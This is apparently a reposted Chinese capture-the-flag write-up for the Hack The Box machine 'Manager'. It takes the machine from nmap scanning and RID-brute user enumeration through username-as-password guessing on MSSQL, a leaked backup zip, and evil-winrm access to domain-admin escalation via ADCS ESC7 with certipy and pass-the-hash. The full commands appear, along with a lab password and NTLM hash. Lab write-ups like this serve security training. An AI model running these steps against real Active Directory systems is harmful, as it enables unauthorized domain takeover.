HTB-Manager

admin 2023年12月12日13:27:00评论45 views字数 2532阅读8分26秒阅读模式

点击蓝字 关注我们

HTB-Manager

免责声明

本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。

如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。

文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。

添加星标不迷路

由于公众号推送规则改变,微信头条公众号信息会被折叠,为了避免错过公众号推送,请大家动动手指设置“星标”,设置之后就可以和从前一样收到推送啦HTB-Manager

HTB-Manager

信息收集

简单的扫一下端口

nmap -sC -sV 10.10.11.236

HTB-Manager

开放了很多的端口 先访问一下80端口 看一看有什么功能点

HTB-Manager

HTB-Manager

是一个写作网站 但是没有啥功能点 翻看源码也没有子域名什么的 然后进行目录探测

探测到的都是一些静态的页面

然后再去看一下其他的端口 开放了445端口 等等其他可以远程连接的服务端口

爆破用户名

利用 CrackMapExec 工具 通过爆破RID 枚举一下用户名

crackmapexec smb 10.10.11.236  -u guest -p '' --shares --rid-brute 10000

HTB-Manager

得到了一堆用户名

administrator
guest
krbtgt
dc01
zhong
cheng
ryan
raven
jinwoo
chinhae
operator

爆破密码

然后尝试弱口令 把用户名作为密码进行枚举

之前nmap扫出来的端口 开放了mssql服务 然后尝试一下

crackmapexec mssql 10.10.11.236 -u user.txt -p user.txt --no-brute

HTB-Manager

成功枚举出来了账户密码

operator:operator

然后利用 impacket包下的工具进入mssql

impacket-mssqlclient manager.htb/operator:[email protected] -windows-auth

HTB-Manager

提权

进入到mssql之后就开始 提取

直接尝试 xp_cmdshell 命令 发现不能执行 又尝试了其他mssql提权的命令 发现可以执行xp_dirtree

那就翻找一下目录

EXEC xp_dirtree 'C:inetpubwwwroot', 0, 1;

0:这是深度参数,指定遍历目录的深度。0 表示只遍历指定目录本身,不包括其子目录。如果你想遍历子目录,可以使用 1。

1:这是文件类型参数,用于筛选要返回的文件类型。1 表示只返回文件,而不包括子目录。如果你想返回子目录,可以使用 0。

HTB-Manager

成功发现了一个zip文件 而且就存在于网站下面 直接访问下载下来

HTB-Manager

HTB-Manager

找到了raven用户的账户密码

利用 evil-winrm进行登录

evil-winrm -i 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'

HTB-Manager

HTB-Manager

成功拿到普通用户的权限

权限提升

这是一台windows靶机 先信息收集一下

HTB-Manager

发现raven在“Certificate Service DCOM Access”组中,就检查ADCS

利用certipy检测一下ADCS有没有漏洞能打

HTB-Manager

HTB-Manager

发现可以用 ESC7 提权

接下来就可以按着GitHub上的大佬文章去做

https://github.com/ly4k/Certipy#esc7

如果您只有访问Manage CA权限,您可以Manage Certificates通过将您的用户添加为新官员来授予自己访问权限。

certipy ca -ca 'manager-DC01-CA' -add-officer raven -username [email protected] -password 'R4v3nBe5tD3veloP3r!123'

HTB-Manager

SubCA可以使用参数在 CA 上启用该模板-enable-template。默认情况下,SubCA模板已启用。

certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username [email protected] -password 'R4v3nBe5tD3veloP3r!123' -debug

HTB-Manager

如果我们已经满足了这次攻击的先决条件,我们可以首先根据模板请求证书SubCA。该请求将被拒绝,但我们将保存私钥并记下请求 ID。

certipy req -username [email protected] -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target 10.10.11.236 -template SubCA -upn [email protected]

HTB-Manager

id为23

通过我们的Manage CA和,我们可以使用命令和参数Manage Certificates发出失败的证书请求。

ca-issue-request <request ID>

certipy ca -ca 'manager-DC01-CA' -issue-request 23 -username [email protected] -password 'R4v3nBe5tD3veloP3r!123'

注意点:

这一步如果报错Got access denied trying to issue certificate 再做一次第一步

HTB-Manager

最后,我们可以使用req命令和-retrieve <request ID>参数检索颁发的证书。

req -username [email protected] -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target 10.10.11.236 -retrieve 23

HTB-Manager

sudo ntpdate -s 10.10.11.236
certipy auth -pfx ./administrator.pfx -dc-ip 10.10.11.236

HTB-Manager

evil-winrm -i 10.10.11.236 -u administrator -H ae5064c2f62317332c88629e025924ef

HTB-Manager

拿到root权限



原文始发于微信公众号(SecHub网络安全社区):HTB-Manager

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月12日13:27:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB-Managerhttps://cn-sec.com/archives/2290232.html

发表评论

匿名网友 填写信息